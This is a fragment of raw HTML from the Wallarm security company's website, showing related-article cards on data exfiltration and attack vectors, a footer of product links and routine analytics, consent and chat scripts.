class="n-resource-meta-wrapper"><div>Mukhadin Beschokov</div> <div>|</div> <div>August 11, 2022</div> </div><div class="n-text-size-small-all-caps">Attacks, Vulnerabilities</div> <div class="n-padding-bottom n-padding-small"></div> <div class="n-text-size-regular n-text-weight-bold">What is Data exfiltration? </div> <p class="n-text-size-regular">Data exfiltration attack is a process of removing, stealing, exporting, manipulating, accessing private data in an unauthorized manner. Detection, tools. </p> </div> </a> </div><div role="listitem" class="collection-item-11 w-dyn-item"> <a href="/what/attack-vector/" class="n-resource-card w-inline-block"> <div class="n-resource-image"><picture height="" loading="lazy"> <source type="image/webp" srcset="/assets/images/TvEneoRrQn-800.webp 800w, /assets/images/TvEneoRrQn-1080.webp 1080w" sizes="100vw"> <source type="image/jpeg" srcset="/assets/images/TvEneoRrQn-800.jpeg 800w, /assets/images/TvEneoRrQn-1080.jpeg 1080w" sizes="100vw"> <img src="/assets/images/TvEneoRrQn-800.jpeg" alt="" height="" loading="lazy" decoding="async"> </picture></div> <div class="n-resource-text-wrapper"><div class="n-resource-meta-wrapper"><div>Ivan Lee</div> <div>|</div> <div>August 8, 2022</div> </div><div class="n-text-size-small-all-caps">Attacks</div> <div class="n-padding-bottom n-padding-small"></div> <div class="n-text-size-regular n-text-weight-bold">Attack vector - What is it? Definition & Examples </div> <p class="n-text-size-regular">A programmer will use an attack vector to acquire unapproved admittance to a PC or organization. Attack vector vs attack surface. What's the difference?</p> </div> </a> </div></div></div> </div> <div id="whats_related_topic_block_navigation" class="reviews-block-navigation whats-related-topics-navigation"> <div class="reviews-block-navigation-item reviews-block-navigation-item-active"></div> <div class="reviews-block-navigation-item"></div> <div class="reviews-block-navigation-item"></div> <div class="reviews-block-navigation-item"></div> </div> <div class="div-block-201"> <a id="whats_related_topic_block_navigation_prev" href="#" class="button-3 reviews-block-action-item w-button"><-</a> <a id="whats_related_topic_block_navigation_next" href="#" class="button-4 reviews-block-action-item w-button">-></a> </div> <div class="div-block-195"></div> </div> </div></div> </div> </div> </div> <footer class="n-footer"> <div class="n-padding-global"> <div class="n-container-large"> <div> <div class="n-footer-container"> <div class="n-top-section"><img src="/assets/images/-header-logo.svg" alt="wallarm logo 2" loading="lazy" width="177" height="" title="Logo Wallarm"></div> <div itemscope="true" itemtype="http://schema.org/WPFooter" class="n-footer-links-wrapper"> <div class="n-footer-line"> <div class="n-footer-left-col"> <div class="n-footer-section-title">Wallarm Products & Platform</div> </div> <div class="n-footer-rigth-col footer"> <a href="/product/api-security-overview/" class="n-footer-link">Integrated App and API Security Platform</a> <a href="/product/advanced-api-security/" class="n-footer-link">Advanced API Security</a> <a href="/product/wallarm-waap/" class="n-footer-link">Cloud-Native WAAP</a> <a href="/product/api-discovery/" class="n-footer-link">API Discovery</a> <a href="/product/fast/" class="n-footer-link">API Security Testing</a> <a href="/product/api-leak-management-early-release/" class="n-footer-link">API Leak Management</a> <a href="/product/integrations/" class="n-footer-link">Integrations</a> <a href="/product/deployment-options/" class="n-footer-link">Deployment</a> </div> </div> <div class="n-footer-line"> <div class="n-footer-left-col"> <div class="n-footer-section-title">Solutions by Need</div> </div> <div class="n-footer-rigth-col footer"> <a href="/solutions/discover-all-apis/" class="n-footer-link">Discover All APIs</a> <a href="/solutions/detect-all-attacks/" class="n-footer-link">Detect All Attacks</a> <a href="/solutions/test-api-for-security-issues/" class="n-footer-link">Test APIs For Security Issues</a> </div> </div> <div class="n-footer-line"> <div class="n-footer-left-col"> <div class="n-footer-section-title">Solutions by Industry</div> </div> <div class="n-footer-rigth-col footer"> <a href="/solutions/wallarm-for-healthcare/" class="n-footer-link">API Security for Healthcare</a> <a href="/solutions/wallarm-for-financial-services/" class="n-footer-link">API Security for Fintech</a> <a href="/solutions/wallarm-for-ecommerce/" class="n-footer-link">API Security for Retail</a> <a href="/solutions/wallarm-for-saas/" class="n-footer-link">API Security for Technology</a> </div> </div> <div class="n-footer-line"> <div class="n-footer-left-col"> <div class="n-footer-section-title">Solutions by Cloud</div> </div> <div class="n-footer-rigth-col footer"> <a href="/solutions/wallarm-for-aws/" class="n-footer-link">AWS</a> <a href="/solutions/wallarm-for-gcp/" class="n-footer-link">GCP</a> <a href="/solutions/wallarm-for-microsoft-azure/" class="n-footer-link">Azure</a> <a href="/solutions/kubernetes-api-security-and-waf-waap/" class="n-footer-link">Kubernetes</a> </div> </div> <div class="n-footer-line"> <div class="n-footer-left-col"> <div class="n-footer-section-title">Resources</div> </div> <div class="n-footer-rigth-col footer"> <a href="/resources/" class="n-footer-link">Resource Library</a> <a href="/resources?tab=whitepapers#resources" class="n-footer-link">Whitepapers</a> <a href="/resources?tab=datasheets#resources" class="n-footer-link">Datasheets</a> <a href="/resources?tab=case-studies#resources" class="n-footer-link">Case Studies</a> <a href="/resources?tab=webinars#resources" class="n-footer-link">Webinars</a> <a href="/what/" class="n-footer-link">Learning Center</a> <a href="/cloud-native-products-101/" class="n-footer-link">Cloud Native Products 101</a> <a href="/glossary/" class="n-footer-link">Glossary</a> <a href="/support/" class="n-footer-link">Support</a> </div> </div> <div class="n-footer-line"> <div class="n-footer-left-col"> <div class="n-footer-section-title">Featured Resources</div> </div> <div class="n-footer-rigth-col footer"> <a href="https://www.wallarm.com/resources/api-security-checklist" class="n-footer-link">API Security Checklist</a> <a href="https://www.wallarm.com/resources/top-five-challenges-in-protecting-apis" class="n-footer-link">Top Five Challenges in Protecting APIs</a> <a href="https://www.wallarm.com/resources/a-cisos-guide-to-cloud-application-security" class="n-footer-link">A CISO's Guide to Cloud Application Security</a> <a href="https://www.wallarm.com/resources/wallarm-for-kubernetes" class="n-footer-link">Wallarm for Kubernetes</a> <a href="https://www.wallarm.com/resources/api-vulnerabilities-discovered-and-exploited-in-q1-2022" class="n-footer-link">API Security Trends. Quarterly Review of API Vulnerabilities</a> </div> </div> <div class="n-footer-line"> <div class="n-footer-left-col"> <div class="n-footer-section-title">Learn Wallarm</div> </div> <div class="n-footer-rigth-col footer"> <div class="n-footer-rigth-col footer"> <a href="https://docs.wallarm.com" class="n-footer-link">Documentation</a> <a href="https://docs.wallarm.com/api/overview/" class="n-footer-link">API specs</a> <a href="https://registry.terraform.io/providers/wallarm/wallarm/latest" class="n-footer-link">Terraform Provider</a> </div> <div class="n-footer-rigth-col footer"> <a href="/terms-of-service/" class="n-footer-link">Terms of Services</a> <a href="/privacy-policy/" class="n-footer-link">Privacy Policy</a> <a href="/cookie-policy/" class="n-footer-link">Cookies Policy</a> <a href="/wallarm-security-bug-bounty-program/" class="n-footer-link">Security Bug Bounty Program</a> <a href="/end-user-license-agreement/" class="n-footer-link">Software License Agreement</a> <a href="/service-level-agreement/" class="n-footer-link">Service Level Agreement</a> <a id="footer-cookies-settings-link" href="#" class="n-footer-link w-inline-block"> <div class="footer-cookies-settings-link">Cookies Settings</div> </a> </div> </div> </div> <div class="n-footer-line"> <div class="n-footer-left-col"> <div class="n-footer-section-title">Company</div> </div> <div class="n-footer-rigth-col footer"> <a href="/company/" class="n-footer-link">About Us</a> <a href="/partners/" class="n-footer-link">Partners</a> <a href="https://wallarm.recruitee.com/" target="_blank" class="n-footer-link">Careers</a> <a href="/wallarm-security-bug-bounty-program/" class="n-footer-link">Security Bug Bounty Program</a> <a href="/end-user-license-agreement/" class="n-footer-link">Software License Agreement</a> <a href="/service-level-agreement/" class="n-footer-link">Service Level Agreement</a> </div> </div> <div class="n-footer-line"> <div class="n-footer-left-col putdown"> <div> <div itemprop="name" class="n-text-size-small n-text-color-white n-text-style-muted">2023 © Wallarm Inc.</div> </div> </div> <div class="n-footer-rigth-col footer vertical pre-aicpasoc-image-wrp"> <div> <div itemtype="https://schema.org/Place" itemprop="contentLocation" itemscope="true"> <div itemtype="https://schema.org/PostalAddress" itemprop="address" itemscope="true"> <div itemprop="streetAddress" class="n-text-size-small n-text-style-muted">188 King St. Unit 508,<br> San Francisco, CA, 94107<br>(415) 940-7077<br>request@wallarm.com</div> </div> </div> </div> <div><picture loading="lazy" width="80" height="80" class="n-aicpa-image"> <source type="image/webp" srcset="/assets/images/sUYUwQmCh1-224.webp 224w" sizes="100vw"> <source type="image/png" srcset="/assets/images/sUYUwQmCh1-224.png 224w" sizes="100vw"> <img src="/assets/images/sUYUwQmCh1-224.png" alt="AICPA logo" loading="lazy" width="80" height="80" class="n-aicpa-image" decoding="async"> </picture></div> </div> </div> </div> </div> </div> </div> </div> </footer> </div> <script src="/assets/external/jquery-3.5.1.min.dc5e7f18c8.js" type="text/javascript" crossorigin="anonymous"></script> <script src="/assets/js/wallarm.js" type="text/javascript"></script> <script type="text/javascript"> window.dataLayer = window.dataLayer || []; </script>  <script> (()=>{var t={152:t=>{var e=Array.isArray;t.exports=e}},e={};function n(o){var r=e[o];if(void 0!==r)return r.exports;var u=e[o]={exports:{}};return t[o](u,u.exports,n),u.exports}n.n=t=>{var e=t&&t.__esModule?()=>t.default:()=>t;return n.d(e,{a:e}),e},n.d=(t,e)=>{for(var o in e)n.o(e,o)&&!n.o(t,o)&&Object.defineProperty(t,o,{enumerable:!0,get:e[o]})},n.o=(t,e)=>Object.prototype.hasOwnProperty.call(t,e),(()=>{"use strict";var t=n(152),e=n.n(t),o=document.location.hostname.indexOf("localhost")>=0?"localhost":".".concat(document.location.hostname.split(".").slice(-2).join("."));function r(t){var e=t.name,n=t.value,r=t.expires,u=void 0===r?0:r,m=t.path,a=void 0===m?"/":m,c=t.subdomains,i=t.domain;return document.cookie=e+"="+encodeURIComponent(n)+(u?"; expires="+new Date(Number(new Date)+1e3*u).toUTCString():"")+(a?"; path="+a:"")+(c?"; domain=".concat(o):"")+(!c&&i?"; domain="+i:"")}var u,m=["utm_source","utm_content","utm_campaign","utm_medium","utm_term"],a={utm_source:(u=function(t){var e,n=document.location.search.replace("?","").split("&"),o={};for(e=0;e<n.length;e++){var r=n[e].split("="),u=decodeURIComponent(r[0]),m=decodeURIComponent(r[1]);o[u]=m}return o}()).utm_source,utm_content:u.utm_content,utm_campaign:u.utm_campaign,utm_medium:u.utm_medium,utm_term:u.utm_term};function c(t){m.forEach((function(e){t[e]?r({name:e,value:t[e],expires:5184e3,secure:!0}):function(t,e){r({name:t,value:"",expires:-1,subdomains:""})}(e)}))}function i(){var t=function(t){if(!e()(t))return{};var n,o,r={};for(o=0;o<t.length;o+=1)(n=String(t[o]).split("="))[0]&&n[1]&&(r[n[0]]=decodeURIComponent(n[1]));return r}((document.cookie||"").split("; "));return{utm_source:t.utm_source,utm_content:t.utm_content,utm_campaign:t.utm_campaign,utm_medium:t.utm_medium,utm_term:t.utm_term}}a.utm_source?c(a):function(){var t=document.referrer;if(t&&!i().utm_source){var e=function(t){if(!t)return"";try{var e=document.createElement("a");return e.href=t,e.hostname}catch(t){}return""}(t);e&&e!==document.location.hostname&&c({utm_source:e})}}();var s,d,l,p,f=document.querySelectorAll(".".concat("signup-my-wallarm-com"));f.length&&(d=i(),l=new URLSearchParams,"",m.forEach((function(t){d[t]&&l.append(t,d[t])})),(s=(p=l.toString()).length?"?".concat(p):"")&&function(t){f.forEach((function(e){var n=e.getAttribute("href"),o=new URL(t,n).toString();e.setAttribute("href",o)}))}(s))})()})(); </script>  <script> var Webflow = Webflow || []; Webflow.push(function () { var tabName = getParam('tab'); if (!tabName) return; $("a[data-w-tab='" + tabName + "']").triggerHandler('click'); function getParam(name) { name = name.replace(/[\[]/, "\\[").replace(/[\]]/, "\\]"); var regex = new RegExp("[\\?&]" + name + "=([^&#]*)"), results = regex.exec(location.search); return results == null ? "" : decodeURIComponent(results[1].replace(/\+/g, " ")); } }); </script> <script type="text/javascript"> function onConversationsAPIReady() { window.dataLayer.push({ "event": "chat-start" }); } if (window.HubSpotConversations) { onConversationsAPIReady(); } else { window.hsConversationsOnReady = [onConversationsAPIReady]; } </script> <script> (()=>{"use strict";function t(t){for(var n=Object.keys(t),e=0;e<n.length;e++){var o=n[e],r=t[o]||"";Sentry.setTag(o,r)}}var n;function e(t){return e="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t},e(t)}function o(t,n,o){return(n=function(t){var n=function(t,n){if("object"!==e(t)||null===t)return t;var o=t[Symbol.toPrimitive];if(void 0!==o){var r=o.call(t,"string");if("object"!==e(r))return r;throw new TypeError("@@toPrimitive must return a primitive value.")}return String(t)}(t);return"symbol"===e(n)?n:String(n)}(n))in t?Object.defineProperty(t,n,{value:o,enumerable:!0,configurable:!0,writable:!0}):t[n]=o,t}var r="analytics",i="personalization",a="advertising",c=[r,i,a],u=(o(n={},a,"ad_storage"),o(n,r,"analytics_storage"),o(n,i,"personalization_storage"),n);function s(){return void 0!==window.tracking.state.consentState&&window.tracking.state.consentState.advertising&&window.tracking.state.consentState.analytics}var d=5e3,f=navigator.userAgent.indexOf("moto g power")>-1;function g(){dataLayer.push(arguments)}function l(){var t=arguments.length>0&&void 0!==arguments[0]?arguments[0]:d;return new Promise((function(n){setTimeout(n,t)}))}window.tracking=window.tracking||{},window.tracking.state=window.tracking.state||{},window.dataLayer=window.dataLayer||[],f||(g("consent","default",{ad_storage:"denied",analytics_storage:"denied",personalization_storage:"denied"}),Promise.resolve().then((function(){if(!window.tracking.state.consentState)return l(500)})).then((function(){if(window.tracking.state.consentState)return function(){for(var t={},n=0;n<c.length;n++){var e=c[n],o=u[e],r=window.tracking.state.consentState[e];t[o]=r?"granted":"denied"}return g("consent","update",t),Promise.resolve()}()})).then((function(){l(d).then((function(){return n=window,document,"GTM-P8GHH8M",n[e="dataLayer"]=n[e]||[],n[e].push({"gtm.start":(new Date).getTime(),event:"gtm.js"}),t="https://www.googletagmanager.com/gtm.js?id=GTM-P8GHH8M",new Promise((function(n){var e=document.createElement("script");e.async=!0,e.onload=n,e.src=t,e.type="text/javascript",document.head.appendChild(e)}));var t,n,e})).catch((function(n){return function(n){var e=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{};"undefined"!=typeof Sentry&&"function"==typeof Sentry.captureException&&(t(e),Sentry.captureException(n))}(n)})),s()||new Promise((function(t){document.addEventListener("consentChangeEvent",(function(){s()&&t()}))})).then((function(){return function(t,n){try{window.localStorage.setItem(t,"true")}catch(t){}}("consent_reload"),void document.location.reload()}))})))})(); </script> <script> (function () { "use strict"; window.lazyLoadScript("https://static.wallarm.com/wallarm-webflow/common/code-lighter-loader.js"); if (!isMobile()) { window.lazyLoadScript("https://static.wallarm.com/wallarm-webflow/common/related-topics-block.js"); } function isMobile() { return navigator.userAgent.indexOf('Mobile') !== -1; } })(); </script> <script src="/assets/js/udesly-11ty.min.js" async="" defer=""></script></body></html>